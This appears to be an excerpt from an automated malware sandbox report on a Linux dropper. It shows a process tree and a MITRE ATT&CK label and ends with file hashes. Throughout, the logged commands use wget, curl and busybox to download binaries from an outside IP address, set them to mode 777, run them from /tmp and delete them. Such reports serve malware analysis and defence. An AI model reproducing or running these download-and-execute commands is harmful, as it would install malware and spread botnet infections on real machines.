/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:863
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:871
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:879
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:885
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:891
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:897
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:903
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:911
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:917
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:923
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:929
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:935
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:938
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97